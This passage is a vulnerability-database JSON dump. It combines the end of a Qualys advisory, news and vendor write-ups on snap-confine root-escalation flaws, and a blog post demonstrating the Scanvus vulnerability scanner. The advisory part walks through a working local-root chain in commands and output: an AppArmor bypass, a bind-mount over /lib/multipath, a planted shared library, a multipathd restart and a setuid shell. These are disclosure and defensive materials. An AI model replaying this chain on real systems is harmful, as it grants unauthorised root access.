exists:\n\n------------------------------------------------------------------------\n# aa-status\napparmor module is loaded.\n32 profiles are loaded.\n32 profiles are in enforce mode.\n ...\n :failed_wwids:/usr/lib/snapd/snap-confine\n------------------------------------------------------------------------\n\nLast, we make sure that snap-confine accepts our \"allow all\" AppArmor\nprofile (i.e., AppArmor is bypassed, and snap-confine is effectively\nunconfined):\n\n------------------------------------------------------------------------\n$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent\n...\nDEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine\nDEBUG: apparmor mode is: enforce\n------------------------------------------------------------------------\n\nWe can therefore bind-mount /tmp onto an arbitrary directory in the\nfilesystem (by exploiting CVE-2022-3328); since we already depend on\nmultipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,\ncreate our own shared library /lib/multipath/libchecktur.so, shutdown\nmultipathd (by exploiting CVE-2022-41974), restart multipathd (through\nits Unix socket), and finally obtain full root privileges (because\nmultipathd executes our shared library as root when it restarts):\n\n------------------------------------------------------------------------\n$ grep multipath /proc/self/mountinfo | wc\n 0 0 0\n\n$ gcc -o CVE-2022-3328 CVE-2022-3328.c\n$ ./CVE-2022-3328\nscratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c\n\n$ grep multipath /proc/self/mountinfo\n1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw\n...\n\n$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c\n\n$ ps -ef | grep 'multipath[d]'\nroot 371 1 0 12:42 ? 
00:00:00 /sbin/multipathd -d -s\n\n$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit\nok\n\n$ ps -ef | grep 'multipath[d]' | wc\n 0 0 0\n\n$ ls -l /tmp/sh\nls: cannot access '/tmp/sh': No such file or directory\n\n$ multipathd list daemon\nerror -104 receiving packet\n\n$ ls -l /tmp/sh\n-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh\n\n$ /tmp/sh -p\n# id\nuid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)\n ^^^^^^^^^^^^\n------------------------------------------------------------------------\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank the Ubuntu security team (Alex Murray and Seth Arnold in\nparticular) and the snapd team for their hard work on this snap-confine\nvulnerability. We also thank the members of linux-distros@openwall.\n", "sourceHref": "https://0day.today/exploit/38096", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEg_O3UT9-eSaotLlYT_E-3sdZdAVxUIvQwoDWA-rjw9JOsCuFa8Al99uMIrj6SGHkbmvGqai3kGQoZAxJXSk3tlzOTqQyVvsGHNttK33F-3i-cMxvSVnw6qfNs9f4CID1nVlfFDvZTLW2TQXVSv7jIs7fAsoQr99Rl2SdjQQ1F7e117koOh4D7EbC86>)\n\nMultiple security vulnerabilities have been disclosed in Canonical's [Snap](<https://en.wikipedia.org/wiki/Snap_\\(package_manager\\)>) software packaging and deployment system, the most critical of which can be exploited to escalate privilege to gain root privileges.\n\nSnaps are self-contained application packages that are designed to work on operating systems that use the Linux kernel and can be installed using a tool called snapd.\n\nTracked as **CVE-2021-44731**, the issue concerns a privilege escalation flaw in the 
[snap-confine](<https://manpages.ubuntu.com/manpages/bionic/man1/snap-confine.1.html>) function, a program used internally by snapd to construct the execution environment for snap applications. The shortcoming is rated 7.8 on the CVSS scoring system.\n\n\"Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host,\" Bharat Jogi, director of vulnerability and threat research at Qualys, [said](<https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731>), adding the weakness could be abused to \"obtain full root privileges on default installations of Ubuntu.\"\n\nRed Hat, in an independent advisory, described the issue as a \"race condition\" in the snap-confine component.\n\n\"A race condition in snap-confine exists when preparing a private mount namespace for a snap,\" the company [noted](<https://ubuntu.com/security/CVE-2021-44731>). 
\"This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence privilege escalation.\"\n\nAdditionally discovered by the cybersecurity firm are six other flaws \u2013\n\n * **CVE-2021-3995** \u2013 Unauthorized unmount in util-linux's libmount\n * **CVE-2021-3996** \u2013 Unauthorized unmount in util-linux's libmount\n * **CVE-2021-3997** \u2013 Uncontrolled recursion in systemd's systemd-tmpfiles\n * **CVE-2021-3998** \u2013 Unexpected return value from glibc's realpath()\n * **CVE-2021-3999** \u2013 Off-by-one buffer overflow/underflow in glibc's getcwd()\n * **CVE-2021-44730** \u2013 Hardlink attack in snap-confine's sc_open_snapd_tool()\n\nThe vulnerability was reported to the Ubuntu security team on October 27, 2021, following which patches were released on February 17 as part of a coordinated disclosure process.\n\nQualys also pointed out that while the flaw isn't remotely exploitable, an attacker that has logged in as an unprivileged user can \"quickly\" exploit the bug to gain root permissions, necessitating that the patches are applied as soon as possible to mitigate potential threats.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T08:37:00", "type": "thn", "title": "New Linux Privilege Escalation Flaw Uncovered in Snap Package Manager", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-3997", "CVE-2021-3998", "CVE-2021-3999", "CVE-2021-44730", "CVE-2021-44731"], "modified": "2022-02-18T08:37:46", "id": "THN:85C69AD4617097A82E6BB57E4EBB6186", "href": "https://thehackernews.com/2022/02/new-linux-privilege-escalation-flaw.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-28T21:32:51", "description": "\n\nThe Qualys Research Team has discovered multiple vulnerabilities in the snap-confine function on Linux operating systems, the most important of which can be exploited to escalate privilege to gain root privileges. 
Qualys recommends security teams apply patches for these vulnerabilities as soon as possible.\n\n### About snap-confine\n\nSnap is a software packaging and deployment system developed by Canonical for operating systems that use the Linux kernel. The packages, called snaps, and the tool for using them, snapd, work across a range of Linux distributions and allow upstream software developers to distribute their applications directly to users. Snaps are self-contained applications running in a sandbox with mediated access to the host system. Snap-confine is a program used internally by snapd to construct the execution environment for snap applications.\n\n### Potential Impact of Oh Snap! More Lemmings Vulnerability\n\nSuccessful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability, develop an exploit, and obtain full root privileges on default installations of Ubuntu.\n\nAs soon as the Qualys Research Team confirmed the vulnerability, we engaged in responsible vulnerability disclosure and coordinated with both vendor and open-source distributions in announcing this newly discovered vulnerability.\n\n# Vulnerability Disclosure Timeline\n\n * 2021-10-27: We sent our advisory and proofs-of-concepts to [security@ubuntu](<mailto://security@ubuntu>).\n * 2021-11-10: We sent our advisory and proofs-of-concepts (without the snap-confine vulnerabilities) to [secalert@redhat](<mailto://secalert@redhat>).\n * 2021-12-29: We sent a write-up and the patch for the systemd vulnerability to [linux-distros@openwall](<mailto://linux-distros@openwall>).\n * 2022-01-10: We published our write-up on the systemd vulnerability (<https://www.openwall.com/lists/oss-security/2022/01/10/2>).\n * 2022-01-12: Red Hat filed the glibc vulnerabilities upstream (<https://sourceware.org/bugzilla/show_bug.cgi?id=28769> and 
<https://sourceware.org/bugzilla/show_bug.cgi?id=28770>).\n * 2022-01-20: We sent a write-up and the patches for the util-linux vulnerabilities to [linux-distros@openwall](<mailto://linux-distros@openwall>).\n * 2022-01-24: We published our write-up on the util-linux vulnerabilities (<https://www.openwall.com/lists/oss-security/2022/01/24/2>).\n * 2022-01-24: We published our write-up on the glibc vulnerabilities (<https://www.openwall.com/lists/oss-security/2022/01/24/4>).\n * 2022-02-03: We sent our advisory and Ubuntu sent their patches for the snap-confine vulnerabilities to [linux-distros@openwall](<mailto://linux-distros@openwall>).\n * 2022-02-17: Coordinated Release Date (5:00 PM UTC) for the snap-confine vulnerabilities.\n\n### Proof of Concept Video of Oh Snap! More Lemmings Exploit\n\n### Vulnerability Summary\n\nCVE| Description \n---|--- \nCVE-2021-44731| Race condition in snap-confine's setup_private_mount() \nCVE-2021-44730| Hardlink attack in snap-confine's sc_open_snapd_tool() \nCVE-2021-3996| Unauthorized unmount in util-linux's libmount \nCVE-2021-3995| Unauthorized unmount in util-linux's libmount \nCVE-2021-3998| Unexpected return value from glibc's realpath() \nCVE-2021-3999| Off-by-one buffer overflow/underflow in glibc's getcwd() \nCVE-2021-3997| Uncontrolled recursion in systemd's systemd-tmpfiles \n \n### Technical Details of Oh Snap! More Lemmings Vulnerability\n\nThe technical details of Oh Snap! More Lemmings vulnerabilities can be found at [<https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt>](<https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt>).\n\n### Solution: How to Patch the Oh Snap! 
More Lemmings Vulnerability\n\nCurrent Qualys customers can search the vulnerability knowledgebase for CVE-2021-44731 to identify all the QIDs and assets vulnerable to this vulnerability.\n\nOther interested parties can start a free Qualys VMDR trial to get full access to the QIDs (detections) for CVE-2021-44731, where all vulnerable assets can be identified.\n\n#### Qualys QID Coverage\n\nQualys is releasing the QIDs in the table below as they become available, starting with vulnsigs version VULNSIGS-2.5.407-2 and in Linux Cloud Agent manifest version lx_manifest-2.5.407.2-1\n\n**QID**| **Title**| **VulnSigs Version** \n---|---|--- \n376419| Snap-Confine Local Privilege Escalation Vulnerability (Oh Snap! More Lemmings)| VULNSIGS-2.5.407-2 / LX_MANIFEST- VULNSIGS-2.5.407.2-1 \n \n### Discover Vulnerable Linux Servers Using Qualys VMDR\n\nThe following instructs current Qualys customers on how to detect Oh Snap! More Lemmings in their environment.\n\n#### Identify Assets Running Ubuntu Operating System\n\nThe first step in managing this critical vulnerability and reducing risk is identification of all assets running Ubuntu OS. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify such assets.\n\n_operatingSystem.name:"Ubuntu"_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019; let\u2019s say: \u201cUbuntu Systems\u201d. This helps by automatically grouping existing hosts with the above vulnerabilities as well as any new assets that spin up in your environment. Tagging makes these grouped assets available for querying, reporting, and management throughout [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n### Prioritize Based on RTIs\n\nUsing Qualys VMDR, the Oh Snap! 
More Lemmings vulnerability can be prioritized using the following real-time threat indicators (RTIs):\n\nPredicted_High_Risk \nPrivilege_Escalation \nEasy_Exploit \nHigh_Lateral_Movement\n\n\n\n### Patch With Qualys VMDR\n\nWe expect vendors to release patches for this vulnerability in the short term. Qualys Patch Management can be used to deploy those patches to vulnerable assets, when available.\n\nUsing the same prioritization based on RTI method as described above, customers can use the \u201cpatch now\u201d button found to the right of the vulnerability to add Oh Snap! More Lemmings to a patch job. Once patches are released, Qualys will find the relevant patches for this vulnerability and automatically add those patches to a patch job. This will allow customers to deploy those patches to vulnerable devices, all from Qualys Cloud Platform. \n\n### Detect Impacted Assets with Threat Protection\n\nQualys VMDR also enables you to automatically map assets vulnerable to Oh Snap! More Lemmings vulnerabilities using Threat Protect.\n\n\n\n### Track Vulnerability with VMDR Dashboard\n\nWith VMDR Unified Dashboard, you can track this vulnerability, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerability trends in your environment using the \u201cOh Snap! More Lemmings\u201d Dashboard.\n\n[View and download the "Oh Snap! More Lemmings\u201d dashboard](<https://blog.qualys.com/wp-content/uploads/2022/02/oh-snap-more-lemmings-dashboard.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2022/02/oh-snap-more-lemmings-dashboard.zip>)\n\n\n\n### Vendor References\n\n<https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt>\n\n### Frequently Asked Questions (FAQs)\n\n#### Will the Qualys Research Team publish exploit code for this vulnerability?\n\nNo. 
Not at this time.\n\n#### Are there any mitigations for this vulnerability?\n\nNo.\n\n#### Is this vulnerability remotely exploitable?\n\nNo. But if an attacker can log in as any unprivileged user, the vulnerability can be quickly exploited to gain root privileges.\n\n#### Why is the vulnerability named \u201cOh Snap! More Lemmings Kit\u201d?\n\nThis is a pun intended on the name of the vulnerable application snap-confine.", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T19:15:55", "type": "qualysblog", "title": "Oh Snap! More Lemmings: Local Privilege Escalation Vulnerability Discovered in snap-confine (CVE-2021-44731)", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-3997", "CVE-2021-3998", "CVE-2021-3999", "CVE-2021-44730", "CVE-2021-44731"], "modified": "2022-02-17T19:15:55", "id": "QUALYSBLOG:9F041FBF31AA14C1B0593ECDE945330B", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2023-08-30T12:44:33", "description": "Hello everyone! 
Great news for my open source [Scanvus](<https://github.com/leonov-av/scanvus>) project! You can now perform vulnerability checks on Linux hosts and docker images not only using the [Vulners.com API](<https://vulners.com/docs/API_wrapper/linux_audit/>), but also with the [Vulns.io VM API](<https://vulns.io/>). It's especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. I just had to do the final test. Many thanks to them for this!\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239113>\n\n## How can the support of these two APIs in Scanvus be useful?\n\n 1. Now there is no binding to one vendor. Choose which service and price you prefer.\n 2. The set of supported operating systems varies between Vulners.com and Vulns.io. If a particular Linux distribution is not supported by one vendor, it may be supported by another vendor.\n 3. Vulners and Vulns.io implemented vulnerability checks independently of each other. If the results differ when scanning the same host/image, then implementation errors will be clearly visible.\n 4. Scanvus is released under the MIT license, so you can use it as an example of working with the Vulners.com and Vulns.io APIs and use this code in your projects.\n\n## How to use it?\n\nBasically, everything works exactly the same. You only need to specify the API you want to use in the --audit-service parameter. This can be "vulners" (default) or "vulnsio".\n\n### Localhost\n\nTo begin, I scanned my localhost. This is a completely updated Ubuntu host. Vulners and Vulns.io did not detect security bulletin vulnerabilities there. 
And this is correct.\n\nVulners did not detect any vulnerabilities at all.\n \n \n $ python3.8 scanvus.py --audit-service vulners --assessment-type localhost\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: localhost\n host: localhost\n Getting OS inventory data...\n os_name: ubuntu\n os_version: 20.04\n package_list_len: 2899\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for localhost (localhost, ubuntu 20.04, linux kernel 5.4.0-135-generic, 2899 packages)\n 0 vulnerabilities were found\n \n\nAnd Vulns.io detected some vulnerabilities.\n \n \n $ python3.8 scanvus.py --audit-service vulnsio --assessment-type localhost\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: localhost\n host: localhost\n Getting OS inventory data...\n os_name: ubuntu\n os_version: 20.04\n package_list_len: 2899\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for localhost (localhost, ubuntu 20.04, linux kernel 5.4.0-135-generic, 2899 packages)\n 3 vulnerabilities with levels ['Medium', 'Critical', 'High'] were found\n 
+---+----------+-------------+------------------+-------------------------------------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +---+----------+-------------+------------------+-------------------------------------------------------------------------------+\n | 1 | Critical | no advisory | CVE-2021-21783 | apparmor-2.13.3-7ubuntu5.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2207 | libapparmor1-2.13.3-7ubuntu5.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-12390 | libapparmor1-2.13.3-7ubuntu5.1.i386 >= 0:0.0.0 |\n | | | | CVE-2021-3773 | chromium-codecs-ffmpeg-extra-1:85.0.4183.83-0ubuntu0.20.04.2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-25236 | gstreamer1.0-libav-1.16.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-24791 | libqt5webengine-data-5.12.8+dfsg-0ubuntu1.1.all >= 0:0.0.0 |\n | | | | CVE-2019-15232 | libqt5webengine5-5.12.8+dfsg-0ubuntu1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-26972 | libqt5webenginecore5-5.12.8+dfsg-0ubuntu1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-12389 | libqt5webenginewidgets5-5.12.8+dfsg-0ubuntu1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2042 | firefox-108.0+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-13576 | firefox-locale-en-108.0+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-23852 | firefox-locale-ru-108.0+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1253 | thunderbird-1:102.4.2+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-29462 | thunderbird-gnome-support-1:102.4.2+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-30475 | thunderbird-locale-en-1:102.4.2+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n ...\n \n\nWhy? Because Vulners and Vulns.io work differently. Vulners only detects vulnerabilities mentioned in bulletins, while Vulns.io also shows vulnerabilities for which there are no bulletins and patches that fix the vulnerability. Such vulnerabilities are grouped by severity with "no advisory" instead of a bulletin identifier. 
Whether you want to see vulnerabilities that you can't fix yet is up to you.\n\n### Linux host\n\nNext, I scanned a test unpatched Debian 11 host.\n \n \n $ ssh-copy-id -i ~/.ssh/id_rsa.pub vmuser@192.168.56.105\n $ ssh -i ~/.ssh/id_rsa.pub vmuser@192.168.56.105\n\nIn this case, vulnerabilities related to security bulletins were detected. And there are not many of them, so the reports can be easily analyzed manually.\n \n \n $ python3.8 scanvus.py --audit-service \"vulners\" --assessment-type \"remote_ssh\" --host \"192.168.56.105\" --user-name \"vmuser\" --key-path \"/home/alexander/.ssh/id_rsa.pub\"\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: remote_ssh\n host: 192.168.56.105\n user_name: vmuser\n key_path: /home/alexander/.ssh/id_rsa.pub\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 364\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for 192.168.56.105 (remote_ssh, debian 11, linux kernel 5.10.0-17-amd64, 364 packages)\n 3 vulnerabilities with levels ['High', 'Medium'] were found\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | 1 | High | DEBIAN:DLA-3152-1:9B676 | CVE-2016-10228 | libc-bin 2.31-13+deb11u3 amd64 < 2.31-13+deb11u4 |\n | | | | CVE-2019-19126 | libc6 2.31-13+deb11u3 amd64 < 2.31-13+deb11u4 |\n | | | | CVE-2019-25013 | locales 
2.31-13+deb11u3 all < 2.31-13+deb11u4 |\n | | | | CVE-2020-10029 | libc-l10n 2.31-13+deb11u3 all < 2.31-13+deb11u4 |\n | | | | CVE-2020-1752 | |\n | | | | CVE-2020-27618 | |\n | | | | CVE-2020-6096 | |\n | | | | CVE-2021-27645 | |\n | | | | CVE-2021-3326 | |\n | | | | CVE-2021-33574 | |\n | | | | CVE-2021-35942 | |\n | | | | CVE-2021-3999 | |\n | | | | CVE-2022-23218 | |\n | | | | CVE-2022-23219 | |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | 2 | Medium | DEBIAN:DLA-3206-1:5481E | CVE-2019-14870 | krb5-locales 1.18.3-6+deb11u1 all < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-3671 | libkrb5-3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libk5crypto3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libkrb5support0 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | libgssapi-krb5-2 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-42898 | |\n | | | | CVE-2022-44640 | |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | 3 | Medium | DEBIAN:DSA-5287-1:12BD4 | CVE-2021-3671 | krb5-locales 1.18.3-6+deb11u1 all < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libkrb5-3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libk5crypto3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | libkrb5support0 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-42898 | libgssapi-krb5-2 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-44640 | |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n \n \n \n $ python3.8 scanvus.py --audit-service \"vulnsio\" --assessment-type \"remote_ssh\" --host \"192.168.56.105\" --user-name \"vmuser\" --key-path \"/home/alexander/.ssh/id_rsa.pub\"\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ 
/$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: remote_ssh\n host: 192.168.56.105\n user_name: vmuser\n key_path: /home/alexander/.ssh/id_rsa.pub\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 364\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for 192.168.56.105 (remote_ssh, debian 11, linux kernel 5.10.0-17-amd64, 364 packages)\n 7 vulnerabilities with levels ['Medium', 'Critical', 'High'] were found\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 1 | Critical | DSA-5236-1 | CVE-2022-40674 | libexpat1-2.2.10-2+deb11u3.amd64 < 0:2.2.10-2+deb11u4 |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 2 | Critical | no advisory | CVE-2022-23303 | apparmor-2.13.6-10.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45952 | libapparmor1-2.13.6-10.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3491 | bluetooth-5.55-3.1.all >= 0:0.0.0 |\n | | | | CVE-2020-27619 | bluez-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-43400 | libbluetooth3-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-29921 | busybox-1:1.30.1-6+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-37454 | dnsmasq-base-2.85-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010022 | libc-bin-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2005-2541 | libc-l10n-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2021-45957 | 
libc6-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-46908 | locales-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2021-42377 | libdb5.3-5.3.28+dfsg1-0.8.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-46848 | libpcre2-8-0-10.36-2.amd64 < 0:10.36-2+deb11u1 |\n | | | | CVE-2022-23304 | libpython3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-8457 | libpython3.9-stdlib-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2210 | python3.9-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2042 | python3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1586 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45954 | libtasn1-6-4.16.0-2.amd64 < 0:4.16.0-2+deb11u1 |\n | | | | CVE-2022-1587 | tar-1.34+dfsg-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45953 | vim-common-2:8.2.2434-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2016-1585 | vim-tiny-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45955 | xxd-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45956 | wpasupplicant-2:2.9.0-21.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45951 | |\n | | | | CVE-2015-20107 | |\n | | | | CVE-2022-2207 | |\n | | | | CVE-2022-0318 | |\n | | | | CVE-2022-1927 | |\n 